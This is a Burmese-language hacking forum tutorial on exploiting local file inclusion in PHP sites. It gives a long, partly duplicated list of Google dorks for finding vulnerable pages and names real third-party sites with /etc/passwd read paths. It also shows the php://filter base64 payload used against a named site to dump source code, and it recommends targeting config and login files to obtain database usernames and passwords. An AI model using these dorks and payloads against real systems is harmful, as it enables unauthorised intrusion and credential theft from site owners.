ဒီပိုစ့္ေလးဟာ LFI ေပၚမွာဆင့္ကဲေျပာင္းလဲထားတာျဖစ္ျပီးေတာ့ BASE 64 php filter ကိုအသံုးျပဳမွာျဖစ္ပါတယ္....။ဆာဗာမွာရိွတဲ့ connect.php / config.php / index.php လိုမ်ိဳး php ဖိုင္ ေတြကိုျမင္ေတြ႕ႏိုင္မွာျဖစ္ပါတယ္...။
ပထမဆံုးေအာက္ပါ LFI Dorks ေတြကိုသံုးျပီး LFI vulnerable sites ေတြကိုရွာပါ...။
inurl:index.php?page=index.php
inurl:index.php?page=sitemap.php
inurl:index.php?page=awards.php
inurl:index.php?page=book.php
inurl:index.php?page=store.php
inurl:index.php?page=items.php
inurl:index.php?page=feedback.php
inurl:index.php?page=welcome.php
inurl:index.php?page=advertise.php
inurl:index.php?page=festival.php
inurl:index.php?page=band.php
inurl:index.php?page=musicians.php
inurl:index.php?page=artist.php
inurl:index.php?page=archive.php
inurl:index.php?page=facilities.php
inurl:index.php?page=activies.php
inurl:index.php?page=bio.php
inurl:index.php?page=biography.php
inurl:index.php?page=menu.php
inurl:index.php?page=profile.php
inurl:index.php?page=terms.php
inurl:index.php?page=tos.php
inurl:index.php?page=screenshots.php
inurl:index.php?page=plans.php
inurl:index.php?page=templates.php
inurl:index.php?page=browse.php
inurl:index.php?page=shows.php
inurl:index.php?page=dining.php
inurl:index.php?page=media.php
inurl:index.php?page=offers.php
inurl:index.php?page=photogallery.php
inurl:index.php?page=schools.php
inurl:index.php?page=rates.php
inurl:index.php?page=buy.php
inurl:index.php?page=pricing.php
inurl:index.php?page=web.php
inurl:index.php?page=cms.php
inurl:index.php?page=sponsors.php
inurl:index.php?page=login.php
inurl:index.php?page=admin.php
inurl:index.php?page=register.php
inurl:index.php?page=signin.php
inurl:index.php?page=signup.php
inurl:index.php?page=artikel.php
inurl:index.php?page=kontakt.php
inurl:index.php?page=directions.php
inurl:index.php?page=farm.php
inurl:index.php?page=resume.php
inurl:index.php?page=products.php
inurl:index.php?page=music.php
inurl:index.php?page=agenda.php
inurl:index.php?page=faculty.php
inurl:index.php?page=overview.php
inurl:index.php?page=research.php
inurl:index.php?page=publications.php
inurl:index.php?page=outreach.php
inurl:index.php?page=education.php
inurl:index.php?page=regulatoins.php
inurl:index.php?page=sitemap.php
inurl:index.php?page=awards.php
inurl:index.php?page=book.php
inurl:index.php?page=store.php
inurl:index.php?page=items.php
inurl:index.php?page=feedback.php
inurl:index.php?page=welcome.php
inurl:index.php?page=advertise.php
inurl:index.php?page=festival.php
inurl:index.php?page=band.php
inurl:index.php?page=musicians.php
inurl:index.php?page=artist.php
inurl:index.php?page=archive.php
inurl:index.php?page=facilities.php
inurl:index.php?page=activies.php
inurl:index.php?page=bio.php
inurl:index.php?page=biography.php
inurl:index.php?page=menu.php
inurl:index.php?page=profile.php
inurl:index.php?page=terms.php
inurl:index.php?page=tos.php
inurl:index.php?page=screenshots.php
inurl:index.php?page=plans.php
inurl:index.php?page=templates.php
inurl:index.php?page=browse.php
inurl:index.php?page=shows.php
inurl:index.php?page=dining.php
inurl:index.php?page=media.php
inurl:index.php?page=offers.php
inurl:index.php?page=photogallery.php
inurl:index.php?page=schools.php
inurl:index.php?page=rates.php
inurl:index.php?page=buy.php
inurl:index.php?page=pricing.php
inurl:index.php?page=web.php
inurl:index.php?page=cms.php
inurl:index.php?page=sponsors.php
inurl:index.php?page=login.php
inurl:index.php?page=admin.php
inurl:index.php?page=register.php
inurl:index.php?page=signin.php
inurl:index.php?page=signup.php
inurl:index.php?page=artikel.php
inurl:index.php?page=kontakt.php
inurl:index.php?page=directions.php
inurl:index.php?page=farm.php
inurl:index.php?page=resume.php
inurl:index.php?page=products.php
inurl:index.php?page=music.php
inurl:index.php?page=agenda.php
inurl:index.php?page=faculty.php
inurl:index.php?page=overview.php
inurl:index.php?page=research.php
inurl:index.php?page=publications.php
inurl:index.php?page=outreach.php
inurl:index.php?page=education.php
inurl:index.php?page=regulatoins.php
ေအာက္ေဖၚျပပါဆိုက္ေတြကို ဥပမာအျဖစ္သံုးႏိုင္ပါသည္........။
http://www.evoca.ch/index.php?page=../etc/passwd
http://www.moto-plus.net/index.php?Page ... etc/passwd
http://www.maxparts.ru/index.php?page=/etc/passwd
http://www.die-drid.de/index.php?mod=ko ... etc/passwd
http://www.sdhpardubice.cz/index.php?page=/etc/passwd
http://www.lc-bensberg-schloss.de/index ... etc/passwd
http://www.misbrugscenterherning.dk/ind ... etc/passwd
==========================================
ဥပမာအေနနဲ႕ ေအာက္ေဖၚျပပါ URL ကိုသံုးထားပါသည္။
http://modelspromo.com/index.php?page=/etc/passwd
ျပီးရင္ ?page= ဆိုတဲ့ေနာက္မွာ ေအာက္ေဖၚျပပါ ကုတ္မ်ားကိုေပါင္းထည့္ေပးပါ.....။
php://filter/convert.base64-encode/resource=index.php
============================================ေအာက္ပါပံုစံအတိုင္း ျဖစ္ပါသည္..........။
http://modelspromo.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
သင့္ browser ထဲမွာေအာက္ပါအတိုင္း ျမင္ေတြ႕ရပါလိမ့္မည္........။ပံုမျမင္ရလွ်င္ ကလစ္ေထာက္ျပီးၾကည့္ပါ...။
PD9waHAKCnNlc3Npb25fc3RhcnQoKTsKCmlmKCRfR0VUWydwYWdlJ109PSIiKSAkcGFnZSA9ICJo ... ..... etc
ျပီးရင္ http://www.crypo.com/tools/eng_base64d.php ကို သြာျပီး paste လုပ္လိုက္ပါ......။ ပံုမွန္အတိုင္းဆိုလွ်င္ index.php
source ေတြကိုမျမင္ရပါဘူး............
ျပီးရင္ decrypt ကိုကလစ္ပါ....အခုဆိုရင္ကၽြန္ေတာ္တို႕ index.php ရဲ႕ source code ေတြကိုျမင္ရပါျပီ...။
connection.php / config.php / configuration.php / configure.php / connect.php ..etc မ်ားတြင္
Data အမ်ားစုကိုထားတတ္ၾကပါသည္....။
တကယ့္ တကယ္ tutorial က ဘာမွ မဟုတ္ဘူးး.. ေရးထားတာကေတာ့ အရွည္ၾကီးပဲ ဟီးးး
အတိုခ်ဳပ္ေျပာရရင္
LFI ေပါက္တဲ့ ေနရာမွာ ဒီ codes
php://filter/convert.base64-encode/resource=index.php
ေလး နဲ႕ php codes ေတြ hack ပီး ၾကည့္တာ
index.php အစား ၾကိဳက္တာ ၾကည့္ေပါ့ login.php တို႕ admin.php တို႕ ဘာညာကြိကြ ...
ကံေကာင္းရင္ username password ေတြရမယ္ :)........
Tuto By blackvenom
source from mmhackforums.noonhost.com
